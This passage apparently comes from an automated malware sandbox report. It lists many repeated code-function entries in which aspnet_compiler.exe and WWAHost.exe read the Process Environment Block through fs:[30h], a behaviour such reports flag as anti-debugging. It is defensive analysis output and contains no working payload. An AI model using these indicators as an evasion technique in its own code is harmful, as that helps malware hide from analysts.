          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_01885210 mov eax, dword ptr fs:[00000030h]5_2_01885210
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_01885210 mov ecx, dword ptr fs:[00000030h]5_2_01885210
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_01885210 mov eax, dword ptr fs:[00000030h]5_2_01885210
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_01885210 mov eax, dword ptr fs:[00000030h]5_2_01885210
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_0188AA16 mov eax, dword ptr fs:[00000030h]5_2_0188AA16
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_0188AA16 mov eax, dword ptr fs:[00000030h]5_2_0188AA16
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_018C4A2C mov eax, dword ptr fs:[00000030h]5_2_018C4A2C
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_018C4A2C mov eax, dword ptr fs:[00000030h]5_2_018C4A2C
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_0194EA55 mov eax, dword ptr fs:[00000030h]5_2_0194EA55
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_01914257 mov eax, dword ptr fs:[00000030h]5_2_01914257
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_01889240 mov eax, dword ptr fs:[00000030h]5_2_01889240
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_01889240 mov eax, dword ptr fs:[00000030h]5_2_01889240
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_01889240 mov eax, dword ptr fs:[00000030h]5_2_01889240
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_01889240 mov eax, dword ptr fs:[00000030h]5_2_01889240
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_0193B260 mov eax, dword ptr fs:[00000030h]5_2_0193B260
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_0193B260 mov eax, dword ptr fs:[00000030h]5_2_0193B260
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_018C927A mov eax, dword ptr fs:[00000030h]5_2_018C927A
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_01958A62 mov eax, dword ptr fs:[00000030h]5_2_01958A62
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_01882D8A mov eax, dword ptr fs:[00000030h]5_2_01882D8A
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_01882D8A mov eax, dword ptr fs:[00000030h]5_2_01882D8A
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_01882D8A mov eax, dword ptr fs:[00000030h]5_2_01882D8A
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_01882D8A mov eax, dword ptr fs:[00000030h]5_2_01882D8A
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_01882D8A mov eax, dword ptr fs:[00000030h]5_2_01882D8A
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_018B2581 mov eax, dword ptr fs:[00000030h]5_2_018B2581
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_018B2581 mov eax, dword ptr fs:[00000030h]5_2_018B2581
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_018B2581 mov eax, dword ptr fs:[00000030h]5_2_018B2581
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_018B2581 mov eax, dword ptr fs:[00000030h]5_2_018B2581
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_018BFD9B mov eax, dword ptr fs:[00000030h]5_2_018BFD9B
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_018BFD9B mov eax, dword ptr fs:[00000030h]5_2_018BFD9B
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_018B35A1 mov eax, dword ptr fs:[00000030h]5_2_018B35A1
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_019505AC mov eax, dword ptr fs:[00000030h]5_2_019505AC
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_019505AC mov eax, dword ptr fs:[00000030h]5_2_019505AC
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_018B1DB5 mov eax, dword ptr fs:[00000030h]5_2_018B1DB5
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_018B1DB5 mov eax, dword ptr fs:[00000030h]5_2_018B1DB5
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_018B1DB5 mov eax, dword ptr fs:[00000030h]5_2_018B1DB5
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_01906DC9 mov eax, dword ptr fs:[00000030h]5_2_01906DC9
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_01906DC9 mov eax, dword ptr fs:[00000030h]5_2_01906DC9
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_01906DC9 mov eax, dword ptr fs:[00000030h]5_2_01906DC9
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_01906DC9 mov ecx, dword ptr fs:[00000030h]5_2_01906DC9
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_01906DC9 mov eax, dword ptr fs:[00000030h]5_2_01906DC9
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_01906DC9 mov eax, dword ptr fs:[00000030h]5_2_01906DC9
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_01938DF1 mov eax, dword ptr fs:[00000030h]5_2_01938DF1
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_0189D5E0 mov eax, dword ptr fs:[00000030h]5_2_0189D5E0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_0189D5E0 mov eax, dword ptr fs:[00000030h]5_2_0189D5E0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_0194FDE2 mov eax, dword ptr fs:[00000030h]5_2_0194FDE2
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_0194FDE2 mov eax, dword ptr fs:[00000030h]5_2_0194FDE2
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_0194FDE2 mov eax, dword ptr fs:[00000030h]5_2_0194FDE2
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_0194FDE2 mov eax, dword ptr fs:[00000030h]5_2_0194FDE2
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_01958D34 mov eax, dword ptr fs:[00000030h]5_2_01958D34
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_0190A537 mov eax, dword ptr fs:[00000030h]5_2_0190A537
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_0194E539 mov eax, dword ptr fs:[00000030h]5_2_0194E539
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_018B4D3B mov eax, dword ptr fs:[00000030h]5_2_018B4D3B
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_018B4D3B mov eax, dword ptr fs:[00000030h]5_2_018B4D3B
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_018B4D3B mov eax, dword ptr fs:[00000030h]5_2_018B4D3B
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_0188AD30 mov eax, dword ptr fs:[00000030h]5_2_0188AD30
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_01893D34 mov eax, dword ptr fs:[00000030h]5_2_01893D34
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_01893D34 mov eax, dword ptr fs:[00000030h]5_2_01893D34
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_01893D34 mov eax, dword ptr fs:[00000030h]5_2_01893D34
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_01893D34 mov eax, dword ptr fs:[00000030h]5_2_01893D34
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_01893D34 mov eax, dword ptr fs:[00000030h]5_2_01893D34
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_01893D34 mov eax, dword ptr fs:[00000030h]5_2_01893D34
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_01893D34 mov eax, dword ptr fs:[00000030h]5_2_01893D34
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_01893D34 mov eax, dword ptr fs:[00000030h]5_2_01893D34
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_01893D34 mov eax, dword ptr fs:[00000030h]5_2_01893D34
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_01893D34 mov eax, dword ptr fs:[00000030h]5_2_01893D34
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_01893D34 mov eax, dword ptr fs:[00000030h]5_2_01893D34
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_01893D34 mov eax, dword ptr fs:[00000030h]5_2_01893D34
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_01893D34 mov eax, dword ptr fs:[00000030h]5_2_01893D34
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 16_2_03743B7A mov eax, dword ptr fs:[00000030h]16_2_03743B7A
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 16_2_03743B7A mov eax, dword ptr fs:[00000030h]16_2_03743B7A
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 16_2_0371DB60 mov ecx, dword ptr fs:[00000030h]16_2_0371DB60
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 16_2_037E8B58 mov eax, dword ptr fs:[00000030h]16_2_037E8B58
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 16_2_0371F358 mov eax, dword ptr fs:[00000030h]16_2_0371F358
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 16_2_0371DB40 mov eax, dword ptr fs:[00000030h]16_2_0371DB40
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 16_2_037D131B mov eax, dword ptr fs:[00000030h]16_2_037D131B
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 16_2_037403E2 mov eax, dword ptr fs:[00000030h]16_2_037403E2
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 16_2_037403E2 mov eax, dword ptr fs:[00000030h]16_2_037403E2
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 16_2_037403E2 mov eax, dword ptr fs:[00000030h]16_2_037403E2
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 16_2_037403E2 mov eax, dword ptr fs:[00000030h]16_2_037403E2
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 16_2_037403E2 mov eax, dword ptr fs:[00000030h]16_2_037403E2
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 16_2_037403E2 mov eax, dword ptr fs:[00000030h]16_2_037403E2
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 16_2_0373DBE9 mov eax, dword ptr fs:[00000030h]16_2_0373DBE9
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 16_2_037953CA mov eax, dword ptr fs:[00000030h]16_2_037953CA
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 16_2_037953CA mov eax, dword ptr fs:[00000030h]16_2_037953CA
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 16_2_03744BAD mov eax, dword ptr fs:[00000030h]16_2_03744BAD
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 16_2_03744BAD mov eax, dword ptr fs:[00000030h]16_2_03744BAD
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 16_2_03744BAD mov eax, dword ptr fs:[00000030h]16_2_03744BAD
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 16_2_037E5BA5 mov eax, dword ptr fs:[00000030h]16_2_037E5BA5
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 16_2_03742397 mov eax, dword ptr fs:[00000030h]16_2_03742397
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 16_2_0374B390 mov eax, dword ptr fs:[00000030h]16_2_0374B390
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 16_2_037D138A mov eax, dword ptr fs:[00000030h]16_2_037D138A
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 16_2_037CD380 mov ecx, dword ptr fs:[00000030h]16_2_037CD380
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 16_2_03721B8F mov eax, dword ptr fs:[00000030h]16_2_03721B8F
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 16_2_03721B8F mov eax, dword ptr fs:[00000030h]16_2_03721B8F
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 16_2_0375927A mov eax, dword ptr fs:[00000030h]16_2_0375927A
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 16_2_037CB260 mov eax, dword ptr fs:[00000030h]16_2_037CB260
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 16_2_037CB260 mov eax, dword ptr fs:[00000030h]16_2_037CB260
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 16_2_037E8A62 mov eax, dword ptr fs:[00000030h]16_2_037E8A62
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 16_2_037DEA55 mov eax, dword ptr fs:[00000030h]16_2_037DEA55
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 16_2_037A4257 mov eax, dword ptr fs:[00000030h]16_2_037A4257
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 16_2_03719240 mov eax, dword ptr fs:[00000030h]16_2_03719240
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 16_2_03719240 mov eax, dword ptr fs:[00000030h]16_2_03719240
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 16_2_03719240 mov eax, dword ptr fs:[00000030h]16_2_03719240
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 16_2_03719240 mov eax, dword ptr fs:[00000030h]16_2_03719240
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 16_2_03754A2C mov eax, dword ptr fs:[00000030h]16_2_03754A2C
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 16_2_03754A2C mov eax, dword ptr fs:[00000030h]16_2_03754A2C
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 16_2_0373A229 mov eax, dword ptr fs:[00000030h]16_2_0373A229
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 16_2_0373A229 mov eax, dword ptr fs:[00000030h]16_2_0373A229
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 16_2_0373A229 mov eax, dword ptr fs:[00000030h]16_2_0373A229
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 16_2_0373A229 mov eax, dword ptr fs:[00000030h]16_2_0373A229
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 16_2_0373A229 mov eax, dword ptr fs:[00000030h]16_2_0373A229
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 16_2_0373A229 mov eax, dword ptr fs:[00000030h]16_2_0373A229
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 16_2_0373A229 mov eax, dword ptr fs:[00000030h]16_2_0373A229
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 16_2_0373A229 mov eax, dword ptr fs:[00000030h]16_2_0373A229
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 16_2_0373A229 mov eax, dword ptr fs:[00000030h]16_2_0373A229
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 16_2_03715210 mov eax, dword ptr fs:[00000030h]16_2_03715210
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 16_2_03715210 mov ecx, dword ptr fs:[00000030h]16_2_03715210
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 16_2_03715210 mov eax, dword ptr fs:[00000030h]16_2_03715210
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 16_2_03715210 mov eax, dword ptr fs:[00000030h]16_2_03715210
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 16_2_0371AA16 mov eax, dword ptr fs:[00000030h]16_2_0371AA16
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 16_2_0371AA16 mov eax, dword ptr fs:[00000030h]16_2_0371AA16
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 16_2_037DAA16 mov eax, dword ptr fs:[00000030h]16_2_037DAA16
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 16_2_037DAA16 mov eax, dword ptr fs:[00000030h]16_2_037DAA16
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 16_2_03733A1C mov eax, dword ptr fs:[00000030h]16_2_03733A1C
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 16_2_03728A0A mov eax, dword ptr fs:[00000030h]16_2_03728A0A
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 16_2_03742AE4 mov eax, dword ptr fs:[00000030h]16_2_03742AE4
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 16_2_03742ACB mov eax, dword ptr fs:[00000030h]16_2_03742ACB
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 16_2_0372AAB0 mov eax, dword ptr fs:[00000030h]16_2_0372AAB0
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 16_2_0372AAB0 mov eax, dword ptr fs:[00000030h]16_2_0372AAB0
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 16_2_0374FAB0 mov eax, dword ptr fs:[00000030h]16_2_0374FAB0
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 16_2_037152A5 mov eax, dword ptr fs:[00000030h]16_2_037152A5
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 16_2_037152A5 mov eax, dword ptr fs:[00000030h]16_2_037152A5
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 16_2_037152A5 mov eax, dword ptr fs:[00000030h]16_2_037152A5
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 16_2_037152A5 mov eax, dword ptr fs:[00000030h]16_2_037152A5
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 16_2_037152A5 mov eax, dword ptr fs:[00000030h]16_2_037152A5
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 16_2_0374D294 mov eax, dword ptr fs:[00000030h]16_2_0374D294
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 16_2_0374D294 mov eax, dword ptr fs:[00000030h]16_2_0374D294
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 16_2_0371B171 mov eax, dword ptr fs:[00000030h]16_2_0371B171
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 16_2_0371B171 mov eax, dword ptr fs:[00000030h]16_2_0371B171
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 16_2_0371C962 mov eax, dword ptr fs:[00000030h]16_2_0371C962
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 16_2_0373B944 mov eax, dword ptr fs:[00000030h]16_2_0373B944
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 16_2_0373B944 mov eax, dword ptr fs:[00000030h]16_2_0373B944
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 16_2_0374513A mov eax, dword ptr fs:[00000030h]16_2_0374513A
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 16_2_0374513A mov eax, dword ptr fs:[00000030h]16_2_0374513A
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 16_2_03734120 mov eax, dword ptr fs:[00000030h]16_2_03734120
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 16_2_03734120 mov eax, dword ptr fs:[00000030h]16_2_03734120
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 16_2_03734120 mov eax, dword ptr fs:[00000030h]16_2_03734120
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 16_2_03734120 mov eax, dword ptr fs:[00000030h]16_2_03734120
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 16_2_03734120 mov ecx, dword ptr fs:[00000030h]16_2_03734120
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 16_2_03719100 mov eax, dword ptr fs:[00000030h]16_2_03719100
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 16_2_03719100 mov eax, dword ptr fs:[00000030h]16_2_03719100
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 16_2_03719100 mov eax, dword ptr fs:[00000030h]16_2_03719100
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 16_2_0371B1E1 mov eax, dword ptr fs:[00000030h]16_2_0371B1E1
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 16_2_0371B1E1 mov eax, dword ptr fs:[00000030h]16_2_0371B1E1
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 16_2_0371B1E1 mov eax, dword ptr fs:[00000030h]16_2_0371B1E1
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 16_2_037A41E8 mov eax, dword ptr fs:[00000030h]16_2_037A41E8
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 16_2_037951BE mov eax, dword ptr fs:[00000030h]16_2_037951BE
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 16_2_037951BE mov eax, dword ptr fs:[00000030h]16_2_037951BE
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 16_2_037951BE mov eax, dword ptr fs:[00000030h]16_2_037951BE
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 16_2_037951BE mov eax, dword ptr fs:[00000030h]16_2_037951BE
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 16_2_037399BF mov ecx, dword ptr fs:[00000030h]16_2_037399BF
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 16_2_037399BF mov ecx, dword ptr fs:[00000030h]16_2_037399BF
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 16_2_037399BF mov eax, dword ptr fs:[00000030h]16_2_037399BF
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 16_2_037399BF mov ecx, dword ptr fs:[00000030h]16_2_037399BF
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 16_2_037399BF mov ecx, dword ptr fs:[00000030h]16_2_037399BF
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 16_2_037399BF mov eax, dword ptr fs:[00000030h]16_2_037399BF
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 16_2_037399BF mov ecx, dword ptr fs:[00000030h]16_2_037399BF
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 16_2_037399BF mov ecx, dword ptr fs:[00000030h]16_2_037399BF
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 16_2_037399BF mov eax, dword ptr fs:[00000030h]16_2_037399BF
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 16_2_037399BF mov ecx, dword ptr fs:[00000030h]16_2_037399BF
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 16_2_037399BF mov ecx, dword ptr fs:[00000030h]16_2_037399BF
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 16_2_037399BF mov eax, dword ptr fs:[00000030h]16_2_037399BF
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 16_2_037461A0 mov eax, dword ptr fs:[00000030h]16_2_037461A0
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 16_2_037461A0 mov eax, dword ptr fs:[00000030h]16_2_037461A0
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 16_2_037D49A4 mov eax, dword ptr fs:[00000030h]16_2_037D49A4
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 16_2_037D49A4 mov eax, dword ptr fs:[00000030h]16_2_037D49A4
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 16_2_037D49A4 mov eax, dword ptr fs:[00000030h]16_2_037D49A4
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 16_2_037D49A4 mov eax, dword ptr fs:[00000030h]16_2_037D49A4
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 16_2_037969A6 mov eax, dword ptr fs:[00000030h]16_2_037969A6
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 16_2_03742990 mov eax, dword ptr fs:[00000030h]16_2_03742990
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 16_2_0373C182 mov eax, dword ptr fs:[00000030h]16_2_0373C182
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 16_2_0374A185 mov eax, dword ptr fs:[00000030h]16_2_0374A185
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 16_2_037E1074 mov eax, dword ptr fs:[00000030h]16_2_037E1074
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 16_2_037D2073 mov eax, dword ptr fs:[00000030h]16_2_037D2073
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 16_2_03730050 mov eax, dword ptr fs:[00000030h]16_2_03730050
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 16_2_03730050 mov eax, dword ptr fs:[00000030h]16_2_03730050
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 16_2_0373A830 mov eax, dword ptr fs:[00000030h]16_2_0373A830
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 16_2_0373A830 mov eax, dword ptr fs:[00000030h]16_2_0373A830
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 16_2_0373A830 mov eax, dword ptr fs:[00000030h]16_2_0373A830
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 16_2_0373A830 mov eax, dword ptr fs:[00000030h]16_2_0373A830
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 16_2_0372B02A mov eax, dword ptr fs:[00000030h]16_2_0372B02A
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 16_2_0372B02A mov eax, dword ptr fs:[00000030h]16_2_0372B02A
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 16_2_0372B02A mov eax, dword ptr fs:[00000030h]16_2_0372B02A
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 16_2_0372B02A mov eax, dword ptr fs:[00000030h]16_2_0372B02A
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 16_2_0374002D mov eax, dword ptr fs:[00000030h]16_2_0374002D
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 16_2_0374002D mov eax, dword ptr fs:[00000030h]16_2_0374002D
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 16_2_0374002D mov eax, dword ptr fs:[00000030h]16_2_0374002D
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 16_2_0374002D mov eax, dword ptr fs:[00000030h]16_2_0374002D
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 16_2_0374002D mov eax, dword ptr fs:[00000030h]16_2_0374002D
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 16_2_037E4015 mov eax, dword ptr fs:[00000030h]16_2_037E4015
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 16_2_037E4015 mov eax, dword ptr fs:[00000030h]16_2_037E4015
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 16_2_03797016 mov eax, dword ptr fs:[00000030h]16_2_03797016
